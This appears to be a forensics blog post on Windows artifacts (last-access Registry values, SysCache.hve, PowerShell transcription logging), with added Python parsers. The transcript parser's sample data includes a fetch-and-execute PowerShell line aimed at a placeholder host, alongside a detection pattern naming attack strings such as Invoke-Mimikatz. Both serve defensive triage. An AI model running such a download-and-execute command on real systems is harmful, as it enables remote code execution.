Tuesday, December 18, 2018

Updates

Based on some testing that Phill had done, I recently updated my Recycle Bin index file ($I*, INFO2) parser.  Since then, there have been some other developments, and I wanted to document some additional updates.

NTFSDisableLastAccessUpdate
We have seen recently that, apparently, as of Win10 1803 there have been changes made to the NTFSDisableLastAccessUpdate value in the Registry (David, Maxim).  The value lives under the HKLM\SYSTEM\CurrentControlSet\Control\FileSystem key, and in short, rather than the "yes" or "no" (i.e., "1" or "0") value data that we're used to seeing, there are a total of 4 options now: 0 (user managed, last access updates enabled), 1 (user managed, updates disabled), 2 (system managed, updates enabled) and 3 (system managed, updates disabled).  The practical point for an analyst is that a value of 2 or 3 was set by Windows itself rather than by an administrator, so the value needs to be checked before either relying on or discounting the last access times from that system.

I've updated the disablelastaccess.pl plugin accordingly.

SysCache.hve
Maxim shared some interesting insight into the SysCache.hve file recently.  This is a file whose structure follows that of Registry hive files (similar to the AmCache.hve file), and is apparently only found on Win7 systems, where it lives in the System Volume Information folder.

There's some additional insight here (on Github) regarding the nature of the various values within some of the keys.

I created the syscache.pl plugin to parse this file, and to really make use of it, you need to also have the MFT from the system, as the SysCache.hve file does not record file names; rather, it records the NTFS file reference number for each file, a 64-bit value in which the low 48 bits are the MFT entry number and the high 16 bits are the sequence number (a counter that is incremented each time that MFT record is reused).  Both halves matter: the entry number locates the record in the MFT, and the sequence number tells you whether that record still describes the same file, or has since been reused for a different one.
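As an added example (mine, not the syscache.pl plugin or any code from the post), the following shows the correlation step described above: splitting a 64-bit NTFS file reference into its entry and sequence numbers and checking it against an $MFT-derived name map. The reference values, the MFT map and its paths are all constructed for illustration; in practice the references come from a hive parser and the map from an $MFT parser.

```python
"""Decode NTFS file reference numbers (as stored in SysCache.hve) and resolve
them against an $MFT-derived name map.  Added example; the reference values
and the MFT map below are constructed, not taken from a real system."""
from typing import Dict, List, NamedTuple


class FileRef(NamedTuple):
    entry: int      # MFT record index: low 48 bits of the reference
    sequence: int   # reuse counter for that record: high 16 bits


def split_file_reference(ref: int) -> FileRef:
    """Split a 64-bit NTFS file reference into (entry number, sequence number)."""
    if not 0 <= ref < (1 << 64):
        raise ValueError("file reference must be an unsigned 64-bit value")
    return FileRef(entry=ref & 0xFFFFFFFFFFFF, sequence=ref >> 48)


def join_file_reference(entry: int, sequence: int) -> int:
    """Inverse of split_file_reference (used here to build sample data)."""
    if not 0 <= entry < (1 << 48) or not 0 <= sequence < (1 << 16):
        raise ValueError("entry or sequence number out of range")
    return (sequence << 48) | entry


class MftEntry(NamedTuple):
    sequence: int   # sequence number currently in the MFT record header
    path: str       # path rebuilt from the $FILE_NAME parent chain


# Constructed stand-in for an $MFT parser's output: entry -> current state.
MFT_MAP: Dict[int, MftEntry] = {
    0:    MftEntry(1, r"\$MFT"),
    1234: MftEntry(3, r"\Windows\System32\calc.exe"),
    5678: MftEntry(7, r"\Users\user\Downloads\updater.exe"),
}


def resolve(ref: int, mft: Dict[int, MftEntry]) -> Dict[str, object]:
    """Map one file reference to a name, flagging stale or missing records.

    status: match   - entry exists and sequence numbers agree; name is trustworthy
            stale   - entry exists but its sequence has moved on: the record was
                      reused after SysCache saw it, so the current name belongs to
                      a different file and the original one has been deleted
            missing - entry number not present in the supplied MFT map
    """
    fr = split_file_reference(ref)
    current = mft.get(fr.entry)
    if current is None:
        status, path = "missing", None
    elif current.sequence == fr.sequence:
        status, path = "match", current.path
    else:
        status, path = "stale", None
    return {"ref": ref, "entry": fr.entry, "sequence": fr.sequence,
            "status": status, "path": path,
            "current_path": current.path if current else None}


def correlate(refs: List[int], mft: Dict[int, MftEntry]) -> List[Dict[str, object]]:
    """Resolve every reference, preserving input order."""
    return [resolve(r, mft) for r in refs]


# Constructed sample of references a SysCache.hve parser might hand over.
SAMPLE_REFS = [
    join_file_reference(1234, 3),   # live file, sequence agrees
    join_file_reference(5678, 6),   # record reused: the original file is gone
    join_file_reference(9999, 1),   # entry not in the MFT map we have
]

if __name__ == "__main__":
    for row in correlate(SAMPLE_REFS, MFT_MAP):
        print(f"0x{row['ref']:016X} entry={row['entry']} seq={row['sequence']} "
              f"{row['status']:7} {row['path'] or ''}")
```

The "stale" case is the one worth pausing on: a name taken from the MFT on entry number alone would be wrong there, and a matching entry with a mismatched sequence number is itself evidence that the file SysCache recorded no longer exists.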

PowerShell Logging
As my background is in DFIR work and not system administration, it was only recently that I ran across PowerShell Transcription Logging. This is a capability that can be enabled via GPO, and as such, there are corresponding Registry values (under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription, principally EnableTranscripting and OutputDirectory) that enable the capability, in addition to the Start-Transcript cmdlet, which can be invoked from PowerShell profiles.  There's also a Registry value in that same key, EnableInvocationHeader, that causes a timestamp to be recorded for each command.

This capability records what goes on in a PowerShell session, both the commands entered and their output, and as such, can be pretty powerful stuff, particularly when combined with PowerShell module and script block logging.

To see what PowerShell transcription logging can provide to an analyst, take a look at this example, provided by FireEye, of a recorded Invoke-Mimikatz script session.  Here's an example (also from FireEye) of what the results of module logging look like for the same session.

As these settings can inform an analyst as to what they can expect to find on a system, I created the pslogging.pl plugin.  However, a dearth of available data has really limited my ability to test the plugin.
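To make the transcript artifact itself concrete, here is an added example (mine, not the pslogging.pl plugin and not FireEye's material) that parses a transcript of the kind transcription logging writes, including the per-command "Command start time" headers produced when the invocation header is enabled, and then applies a simple triage pattern to the recovered command lines. The transcript text is constructed to mirror that format (banner lines of asterisks, a key/value start block, a "PS path>" prompt per command), the host name, user and URL are made up, and the suspicious-string list is my own illustrative choice rather than anything from the post.

```python
"""Parse a PowerShell transcript (Start-Transcript / transcription logging,
optionally with EnableInvocationHeader) into session fields and timed commands.
Added example; the transcript below is constructed to mirror the format."""
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, List, Optional

BANNER = re.compile(r"^\*{10,}\s*$")           # ********** separator lines
PROMPT = re.compile(r"^PS [^>]*> ?(.*)$")       # "PS C:\path> command"
KEYVAL = re.compile(r"^([A-Za-z ]+): ?(.*)$")   # "Username: CORP\analyst"
# Illustrative triage strings (my own short list, not exhaustive).
SUSPICIOUS = re.compile(
    r"DownloadString|Invoke-Mimikatz|-EncodedCommand|FromBase64String|\bIEX\b|Invoke-Expression",
    re.IGNORECASE)


@dataclass
class Command:
    start_time: Optional[str]            # yyyyMMddHHmmss from the invocation header, else None
    text: str
    output: List[str] = field(default_factory=list)


@dataclass
class Transcript:
    session: Dict[str, str] = field(default_factory=dict)   # fields from start/end blocks
    commands: List[Command] = field(default_factory=list)


def to_iso(ts: str) -> str:
    """Convert the transcript's yyyyMMddHHmmss stamp to ISO 8601."""
    return datetime.strptime(ts, "%Y%m%d%H%M%S").isoformat()


def parse_transcript(text: str) -> Transcript:
    t = Transcript()
    lines = text.splitlines()
    pending_time: Optional[str] = None   # stamp waiting for its command line
    i = 0
    while i < len(lines):
        if BANNER.match(lines[i]):
            # Header block: everything up to the closing banner line.
            block: List[str] = []
            j = i + 1
            while j < len(lines) and not BANNER.match(lines[j]):
                block.append(lines[j])
                j += 1
            i = j + 1
            if not block:
                continue
            if block[0].startswith("Command start time:"):
                pending_time = block[0].split(":", 1)[1].strip()
            elif "transcript start" in block[0] or "transcript end" in block[0]:
                for entry in block[1:]:
                    m = KEYVAL.match(entry)
                    if m:
                        t.session[m.group(1).strip()] = m.group(2).strip()
            continue
        m = PROMPT.match(lines[i])
        if m:                                  # a new command at the prompt
            t.commands.append(Command(pending_time, m.group(1).strip()))
            pending_time = None
        elif t.commands:                       # anything else is output of the last one
            t.commands[-1].output.append(lines[i])
        i += 1
    return t


def find_suspicious(t: Transcript, pattern=SUSPICIOUS) -> List[Command]:
    return [c for c in t.commands if pattern.search(c.text)]


SAMPLE_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20181209101500
Username: CORP\analyst
RunAs User: CORP\analyst
Machine: WS01 (Microsoft Windows NT 10.0.17134.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 4120
**********************
**********************
Command start time: 20181209101512
**********************
PS C:\Users\analyst> Get-Process | Select-Object -First 1

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
    222      14     2684       7080       0.05   4168   0 AggregatorHost
**********************
Command start time: 20181209101530
**********************
PS C:\Users\analyst> IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')
**********************
Windows PowerShell transcript end
End time: 20181209101602
**********************
"""

if __name__ == "__main__":
    t = parse_transcript(SAMPLE_TRANSCRIPT)
    print(f"{t.session.get('Username')} on {t.session.get('Machine')}, PID {t.session.get('Process ID')}")
    for c in t.commands:
        when = to_iso(c.start_time) if c.start_time else "unknown"
        print(f"{when}  {c.text}{'  <-- review' if SUSPICIOUS.search(c.text) else ''}")
```

Without EnableInvocationHeader the transcript still carries the session start and end times from its header blocks, but each command's start_time comes back as None, which is exactly the gap the Registry value closes; the parser keeps that distinction rather than guessing a time.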

*Note: This post was originally authored on 9 Dec 2018
